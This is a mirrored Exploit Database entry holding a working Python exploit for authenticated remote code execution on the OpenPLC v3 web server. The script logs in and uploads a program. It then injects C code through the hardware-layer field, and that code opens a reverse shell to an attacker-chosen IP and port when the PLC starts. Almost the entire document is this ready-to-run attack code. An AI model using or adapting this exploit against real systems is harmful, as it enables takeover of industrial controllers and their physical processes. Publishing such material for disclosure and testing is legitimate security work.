OpenPLC 3 – Remote Code Execution (Authenticated)

• Exploit Database
• 105 阅读

• 作者： Fellipe Oliveira
  日期： 2021-04-26
• 类别：

  • webapps
  平台：

  • Python
• 来源：https://www.exploit-db.com/exploits/49803/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110

  # Exploit Title: OpenPLC 3 - Remote Code Execution (Authenticated) # Date: 25/04/2021 # Exploit Author: Fellipe Oliveira # Vendor Homepage: https://www.openplcproject.com/ # Software Link: https://github.com/thiagoralves/OpenPLC_v3 # Version: OpenPLC v3 # Tested on: Ubuntu 16.04,Debian 9,Debian 10 Buster   #/usr/bin/python3   import requests import sys import time import optparse import re   parser = optparse.OptionParser() parser.add_option(&apos;-u&apos;, &apos;--url&apos;, action="store", dest="url", help="Base target uri (ex. http://target-uri:8080)") parser.add_option(&apos;-l&apos;, &apos;--user&apos;, action="store", dest="user", help="User credential to login") parser.add_option(&apos;-p&apos;, &apos;--passw&apos;, action="store", dest="passw", help="Pass credential to login") parser.add_option(&apos;-i&apos;, &apos;--rip&apos;, action="store", dest="rip", help="IP for Reverse Connection") parser.add_option(&apos;-r&apos;, &apos;--rport&apos;, action="store", dest="rport", help="Port for Reverse Connection")   options, args = parser.parse_args() if not options.url: print(&apos;[+] Remote Code Execution on OpenPLC_v3 WebServer&apos;) print(&apos;[+] Specify an url target&apos;) print("[+] Example usage: exploit.py -u http://target-uri:8080 -l admin -p admin -i 192.168.1.54 -r 4444") exit()   host = options.url login = options.url + &apos;/login&apos; upload_program = options.url + &apos;/programs&apos; compile_program = options.url + &apos;/compile-program?file=681871.st&apos; run_plc_server = options.url + &apos;/start_plc&apos; user = options.user password = options.passw rev_ip = options.rip rev_port = options.rport x = requests.Session()   def auth(): print(&apos;[+] Remote Code Execution on OpenPLC_v3 WebServer&apos;) time.sleep(1) print(&apos;[+] Checking if host &apos;+host+&apos; is Up...&apos;) host_up = x.get(host) try: if host_up.status_code == 200: print(&apos;[+] Host Up! ...&apos;) except: print(&apos;[+] This host seems to be down :( &apos;) sys.exit(0)   print(&apos;[+] Trying to authenticate with credentials &apos;+user+&apos;:&apos;+password+&apos;&apos;) time.sleep(1) submit = { &apos;username&apos;: user, &apos;password&apos;: password } x.post(login, data=submit) response = x.get(upload_program)   if len(response.text) > 30000 and response.status_code == 200: print(&apos;[+] Login success!&apos;) time.sleep(1) else: print(&apos;[x] Login failed :(&apos;) sys.exit(0)   def injection(): print(&apos;[+] PLC program uploading... &apos;) upload_url = host + "/upload-program" upload_cookies = {"session": ".eJw9z7FuwjAUheFXqTx3CE5YInVI5RQR6V4rlSPrekEFXIKJ0yiASi7i3Zt26HamT-e_i83n6M-tyC_j1T-LzXEv8rt42opcIEOCCtgFysiWKZgic-otkK2XLr53zhQTylpiOC2cKTPkYt7NDSMlJJtv4NcO1Zq1wQhMqbYk9YokMSWgDgnK6qRXVevsbPC-1bZqicsJw2F2YeksTWiqANwkNFsQXdSKUlB16gIskMsbhF9_9yIe8_fBj_Gj9_3lv-Z69uNfkvgafD90O_H4ARVeT-s.YGvgPw.qwEcF3rMliGcTgQ4zI4RInBZrqE"} upload_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------210749863411176965311768214500", "Origin": host, "Connection": "close", "Referer": host + "/programs", "Upgrade-Insecure-Requests": "1"} upload_data = "-----------------------------210749863411176965311768214500\r\nContent-Disposition: form-data; name=\"file\"; filename=\"program.st\"\r\nContent-Type: application/vnd.sailingtracker.track\r\n\r\nPROGRAM prog0\nVAR\nvar_in : BOOL;\nvar_out : BOOL;\nEND_VAR\n\nvar_out := var_in;\nEND_PROGRAM\n\n\nCONFIGURATION Config0\n\nRESOURCE Res0 ON PLC\nTASK Main(INTERVAL := T#50ms,PRIORITY := 0);\nPROGRAM Inst0 WITH Main : prog0;\nEND_RESOURCE\nEND_CONFIGURATION\n\r\n-----------------------------210749863411176965311768214500\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\nUpload Program\r\n-----------------------------210749863411176965311768214500--\r\n" upload = x.post(upload_url, headers=upload_headers, cookies=upload_cookies, data=upload_data)   act_url = host + "/upload-program-action" act_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------374516738927889180582770224000", "Origin": host, "Connection": "close", "Referer": host + "/upload-program", "Upgrade-Insecure-Requests": "1"} act_data = "-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"prog_name\"\r\n\r\nprogram.st\r\n-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"prog_descr\"\r\n\r\n\r\n-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"prog_file\"\r\n\r\n681871.st\r\n-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"epoch_time\"\r\n\r\n1617682656\r\n-----------------------------374516738927889180582770224000--\r\n" upload_act = x.post(act_url, headers=act_headers, data=act_data) time.sleep(2)   def connection(): print(&apos;[+] Attempt to Code injection...&apos;) inject_url = host + "/hardware" inject_dash = host + "/dashboard" inject_cookies = {"session": ".eJw9z7FuwjAUheFXqTx3CE5YInVI5RQR6V4rlSPrekEFXIKJ0yiASi7i3Zt26HamT-e_i83n6M-tyC_j1T-LzXEv8rt42opcIEOCCtgFysiWKZgic-otkK2XLr53zhQTylpiOC2cKTPkYt7NDSMlJJtv4NcO1Zq1wQhMqbYk9YokMSWgDgnK6qRXVevsbPC-1bZqicsJw2F2YeksTWiqANwkNFsQXdSKUlB16gIskMsbhF9_9yIe8_fBj_Gj9_3lv-Z69uNfkvgafD90O_H4ARVeT-s.YGvyFA.2NQ7ZYcNZ74ci2miLkefHCai2Fk"} inject_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------289530314119386812901408558722", "Origin": host, "Connection": "close", "Referer": host + "/hardware", "Upgrade-Insecure-Requests": "1"} inject_data = "-----------------------------289530314119386812901408558722\r\nContent-Disposition: form-data; name=\"hardware_layer\"\r\n\r\nblank_linux\r\n-----------------------------289530314119386812901408558722\r\nContent-Disposition: form-data; name=\"custom_layer_code\"\r\n\r\n#include \"ladder.h\"\r\n#include <stdio.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n\r\n\r\n//-----------------------------------------------------------------------------\r\n\r\n//-----------------------------------------------------------------------------\r\nint ignored_bool_inputs[] = {-1};\r\nint ignored_bool_outputs[] = {-1};\r\nint ignored_int_inputs[] = {-1};\r\nint ignored_int_outputs[] = {-1};\r\n\r\n//-----------------------------------------------------------------------------\r\n\r\n//-----------------------------------------------------------------------------\r\nvoid initCustomLayer()\r\n{\r\n \r\n\r\n\r\n}\r\n\r\n\r\nvoid updateCustomIn()\r\n{\r\n\r\n}\r\n\r\n\r\nvoid updateCustomOut()\r\n{\r\nint port = "+rev_port+";\r\nstruct sockaddr_in revsockaddr;\r\n\r\nint sockt = socket(AF_INET, SOCK_STREAM, 0);\r\nrevsockaddr.sin_family = AF_INET; \r\nrevsockaddr.sin_port = htons(port);\r\nrevsockaddr.sin_addr.s_addr = inet_addr(\""+rev_ip+"\");\r\n\r\nconnect(sockt, (struct sockaddr *) &revsockaddr, \r\nsizeof(revsockaddr));\r\ndup2(sockt, 0);\r\ndup2(sockt, 1);\r\ndup2(sockt, 2);\r\n\r\nchar * const argv[] = {\"/bin/sh\", NULL};\r\nexecve(\"/bin/sh\", argv, NULL);\r\n\r\nreturn 0;\r\n\r\n}\r\n\r\n\r\n\r\n\r\n\r\n\r\n-----------------------------289530314119386812901408558722--\r\n" inject = x.post(inject_url, headers=inject_headers, cookies=inject_cookies, data=inject_data) time.sleep(3) comp = x.get(compile_program) time.sleep(6) x.get(inject_dash) time.sleep(3) print(&apos;[+] Spawning Reverse Shell...&apos;) start = x.get(run_plc_server) time.sleep(1) if start.status_code == 200: print(&apos;[+] Reverse connection receveid!&apos;) sys.exit(0) else: print(&apos;[+] Failed to receive connection :(&apos;) sys.exit(0)   auth() injection() connection()